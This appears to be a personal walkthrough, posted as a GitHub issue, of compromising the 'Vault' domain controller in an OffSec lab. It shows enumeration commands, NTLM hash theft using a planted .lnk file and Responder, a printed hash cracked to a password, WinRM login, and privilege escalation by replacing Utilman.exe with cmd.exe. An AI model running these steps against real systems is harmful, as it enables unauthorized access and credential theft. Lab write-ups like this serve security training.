Open WDavid404 opened 2 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-10 14:41:57Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49703/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49804/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
--> no info
rpcclient -U '' -N 192.168.208.172 --> no info
crackmapexec smb 192.168.208.172 --shares
--> no info
smbmap -u null -p "" -H 192.168.208.172 -P 445 -r 2>&1
-->
smbclient //192.168.208.172/DocumentsShare
--》
no file exist but we can upload files.
ldapsearch -H ldap://192.168.208.172 -x -s base namingcontexts
-->
namingcontexts: DC=vault,DC=offsec
namingcontexts: CN=Configuration,DC=vault,DC=offsec
namingcontexts: CN=Schema,CN=Configuration,DC=vault,DC=offsec
namingcontexts: DC=DomainDnsZones,DC=vault,DC=offsec
namingcontexts: DC=ForestDnsZones,DC=vault,DC=offsec
ldapsearch -H ldap://192.168.208.172 -x -b"DC=vault,DC=offsec" --> no info
GetNPUsers.py vault.offsec/ -dc-ip 192.168.208.172 --> no info
ntlm_theft
A tool for generating multiple types of NTLMv2 hash theft files.
python3 ntlm_theft.py -g lnk -s 192.168.45.205 -f test
-->
Created: test/test.lnk (BROWSE TO FOLDER)
Generation Complete.
sudo responder -I tun0
Put test.link to SMB
then, we got NTML hash info
anirudh::VAULT:f2ec956185976991:33271D831D2A00FEC4E4011576C143C7:010100000000000080115D2A7EEBDA01F6AE5B5DB64B0BB50000000002000800430046004200520001001E00570049004E002D0056004D0059004E003000320056004B0055004C00480004003400570049004E002D0056004D0059004E003000320056004B0055004C0048002E0043004600420052002E004C004F00430041004C000300140043004600420052002E004C004F00430041004C000500140043004600420052002E004C004F00430041004C000700080080115D2A7EEBDA01060004000200000008003000300000000000000001000000002000001830F0C706803F0173332094F5B2BB5FB0C4DAD79922348512363CC7DC51C8100A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100390031000000000000000000
crack the hash with john tool --> anirudh: SecureHM
evil-winrm -i 192.168.208.172 -u anirudh -p SecureHM
whoami /priv We can see "SeRestorePrivilige" is enabled. =====> We can use the same way as "Heist box" (https://github.com/WDavid404/PG-Box/issues/57#issuecomment-2277967937)
get-childitem -path C:\Windows\System32\ -include utilman.exe -file -recurse -erroraction silentlycontinue --> utilman.exe is located in "C:\Windows\System32" cd C:\Windows\System32 mv Utilman.exe Utilman-bk.exe mv cmd.exe Utilman.exe
[Kali] rdesktop $IP
Keypoints: